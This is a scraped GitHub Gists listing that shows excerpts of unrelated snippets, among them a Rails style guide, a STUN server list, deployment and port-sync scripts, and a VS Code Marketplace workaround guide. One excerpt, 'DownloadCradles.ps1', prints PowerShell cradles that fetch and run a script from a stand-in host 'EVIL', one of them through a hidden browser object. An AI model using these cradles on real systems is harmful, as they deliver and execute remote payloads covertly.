Skip to content

Instantly share code, notes, and snippets.

@aamiaa
aamiaa / CompleteDiscordQuest.md
Last active December 15, 2025 15:42
Complete Recent Discord Quest

Complete Recent Discord Quest

Note

This does not works in browser for quests which require you to play a game! Use the desktop app to complete those.

How to use this script:

  1. Accept a quest under Discover -> Quests
  2. Press Ctrl+Shift+I to open DevTools
  3. Go to the Console tab
  4. Paste the following code and hit enter:

The Unofficial 37signals/DHH Rails Style Guide

About This Document

This style guide was generated by Claude Code through deep analysis of the Fizzy codebase - 37signals' open-source project management tool.

Why Fizzy matters: While 37signals has long advocated for "vanilla Rails" and opinionated software design, their production codebases (Basecamp, HEY, etc.) have historically been closed source. Fizzy changes that. For the first time, developers can study a real 37signals/DHH-style Rails application - not just blog posts and conference talks, but actual production code with all its patterns, trade-offs, and deliberate omissions.

How this was created: Claude Code analyzed the entire codebase - routes, controllers, models, concerns, views, JavaScript, CSS, tests, and configuration. The goal was to extract not just what patterns are used, but why - inferring philosophy from implementation choices.

@mondain
mondain / public-stun-list.txt
Last active December 15, 2025 15:39
Public STUN server list
23.21.150.121:3478
iphone-stun.strato-iphone.de:3478
numb.viagenie.ca:3478
s1.taraba.net:3478
s2.taraba.net:3478
stun.12connect.com:3478
stun.12voip.com:3478
stun.1und1.de:3478
stun.2talk.co.nz:3478
stun.2talk.com:3478
@matbu
matbu / deploy-standalone-aap.md
Created December 11, 2024 09:49
How to deploy Standalone Ansible Automation Platform (AAP) - container based deployment

🚀 Deploying Ansible Automation Platform (AAP) on a Standalone Linux Machine

This guide demonstrates how to deploy Red Hat's Ansible Automation Platform (AAP) in a standalone, containerized setup. It assumes you already have a Linux machine ready for deployment.


Instance Specifications

I'm using an OpenStack instance with the following specifications:

  • vCPUs: 16
  • RAM: 32 GB
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active December 15, 2025 15:33
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@thejorro
thejorro / update_qbit_port_protonvpn.ps1
Last active December 15, 2025 15:32 — forked from idwpan/update_qbit_port_protonvpn.ps1
Windows PowerShell script to auto update the qBittorrent port to latest ProtonVPN port forward
########################################################################################################################
# Script to Synchronize qBittorrent Listening Port with ProtonVPN assigned port on Windows.
#
# Modified from @idwpan's original to now restart the Windows service. This forces a refresh of the Windows Notification
# database which will ensure the latest port number is stored.
#
# Description:
# This PowerShell script automates the synchronization of qBittorrent's listening port with the
# port number assigned by ProtonVPN's port forwarding feature. It continuously monitors the
# system to check if ProtonVPN is connected and if qBittorrent is running. When both conditions
@DGriffin91
DGriffin91 / bs13_brain_dump.rs
Last active December 15, 2025 15:32
bs13 brain dump
#[derive(Debug, Hash, PartialEq, Eq, Clone, SystemSet)]
pub enum BS13RenderSet {
Init,
Pipeline,
/// Just the spot tangents are generated if enabled. The renderer can also use tangents from the GLTF and fallback
/// to generating them in the fragment shader.
GenerateTangents,
@nattybear
nattybear / naver.md
Created June 13, 2017 14:55
네이버에서 마크다운 사용하기

네이버에서 마크다운 사용하기

네이버에서 지원하는 에디터는 마크다운을 지원하지 않아. 하지만 에디터를 보면 html 모드를 지원하지. 그래서 이걸 이용하면 네이버에서 마크다운을 사용 할 수 있어. 우선은 인터넷에서 아래 프로그램을 검색해서 설치해봐.

haroopad

하루패드라는 프로그램인데 무료 마크다운 편집기야. 이 프로그램에서 원하는 내용을 마크다운으로 작성하고 아래와 같은 메뉴를 이용하면 html코드로 변환을 해줘

File -> Export -> Styled HTML

@anxkhn
anxkhn / VSCode_Marketplace_Tutorial.md
Last active December 15, 2025 15:29
Enable Marketplace on non MS VSCode Forks.

Enabling VS Code Marketplace in VSCodium and Trae

Microsoft claims Visual Studio Code (VS Code) is open source, yet it restricts the use of its Marketplace extensions in non-Microsoft products like VSCodium (telemetry/tracking free open source fork), Cursor, Windsurf, Trae, and other VS Code-based IDEs, enforcing what some see as monopolistic control. This guide provides a workaround to enable the VS Code Marketplace in VSCodium and Trae (more to be added soon), allowing you to freely use extensions. Note that using the VS Code Marketplace with non-Microsoft products may violate its terms of use, which state that extensions are intended for use only with Microsoft Visual Studio products. Proceed at your discretion after reviewing the terms.


Enabling VS Code Marketplace in VSCodium

To configure VSCodium to use the VS Code Marketplace instead of the default OpenVSX Registry, you can either set environment variables or create a custom product.json file.